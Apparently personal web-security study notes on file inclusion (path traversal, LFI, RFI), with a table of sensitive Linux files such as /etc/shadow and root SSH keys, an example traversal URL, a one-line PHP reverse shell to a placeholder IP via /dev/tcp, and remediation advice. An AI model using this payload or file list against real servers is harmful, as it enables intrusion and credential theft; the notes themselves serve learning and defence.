File Inclusion

  • The main issue with these is input validation, the user inputs are not sanitized or validated, and the user controls them

  • When input is not validated, the user can pass any input to the function, causing a vulnerability

Risks

  • Can be used to read sensitive data

  • If you can write to places like the /tmp directory you can gain RCE

Path Traversal

  • Allows attackers to read OS resources

    • local files running an application

  • Exploit this vulnerability by manipulating and abusing the web application's URL to locate files and access files or directories stored outside the apps root directory

  • Happen when user's inputs is passed to a function like file_get_contents in PHP to read the content of a file

Path Traversal

Common OS files

Location

Description

/etc/issue

contains a message or system identification to be printed before the login attempt.

/etc/profile

controls system-wide default variables (Export variables, File creation mask, etc.)

/proc/version

specifies the version of the Linux kernel

/etc/passwd

has all registered user that has access to a system

/etc/shadow

contains information about the system's user's password

/root/.bash_history

contains the history command for root user

/var/log/dmessage

contains global system messages, including messages that are logged during system startup

/var/mail/root

all emails for root user

/root/.ssh/id_rsa

Private SSH keys for a root or any known valid user on the server

/var/log/apache2/access.log

the accessed requests for Apache webserver

C:\boot.ini

contains the boot options for computers with BIOS firmware

  • Examples

    • http://TARGET_URL/index.php?file=/etc/passwd

Remote File Inclusion (RFI)

  • Technique to include remote files and into a vulnerable application

  • One requirement for RFI is that the allow_url_fopen option needs to be on

  • Allows an attacker to gain RCE on the server and can lead to

    • Sensitive Information Disclosure

    • Cross-site Scripting (XSS)

    • DoS

    Remote File Inclusion

Local File Inclusion

  • Creates a reverse shell file

<?php
exec("/bin/bash -c `bash -i >& /dev/tcp/<IP><Port> 0>&1`")
?>

Remediation

  • Keep system and services, including web application frameworks, updated with the latest version

  • Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information

  • A WAF is a good option to help mitigate web application hacks

  • Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them (allow_url_fopen and allow_url_include)

  • Carefully analyze the web application and allow only protocols and PHP wrappers that are in need

  • Never trust user input, and make sure to implement proper input validation against file inclusion

  • Implement whitelisting for file names and locations as well as blacklisting

PreviousCross-Site Request ForgeryNextServer-Side Request Forgery

Last updated